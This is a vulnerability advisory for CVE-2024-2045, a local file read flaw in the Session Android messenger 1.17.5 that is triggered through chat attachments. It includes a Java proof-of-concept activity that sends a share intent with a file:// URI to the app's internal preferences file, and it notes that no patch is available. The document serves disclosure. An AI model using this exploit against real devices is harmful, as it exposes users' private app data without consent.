Session 1.17.5 - LFR via chat attachment

Description

Session version 1.17.5 allows obtaining internal application files and public files from the user's device without the user's consent. This is possible because the application is vulnerable to Local File Read via chat attachments.

Vulnerability

An arbitrary local file reading (LFR) vulnerability has been identified in Session. The exploit allows an attacker to obtain internal application files or files from public paths accessed by the application such as images, downloads, etc.

Exploit

[...]

public class MainActivity extends AppCompatActivity {

    [...]

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        [...]

        // Hacking Here
        StrictMode.setVmPolicy(StrictMode.VmPolicy.LAX);
        Intent intent = new Intent("android.intent.action.SEND");
        intent.setClassName("network.loki.messenger","org.thoughtcrime.securesms.ShareActivity");
        intent.putExtra(Intent.EXTRA_STREAM, Uri.parse("file:///data/user/0/network.loki.messenger/shared_prefs/network.loki.messenger_preferences.xml"));
        startActivity(intent);
    }

    [...]
}

Our security policy

We have reserved the ID CVE-2024-2045 to refer to this issue from now on.

Disclosure policy

System Information

• Version: Session 1.17.5

• Operating System: Android

Mitigation

There is currently no patch available for this vulnerability.

References

• Vendor page https://github.com/oxen-io/session-android/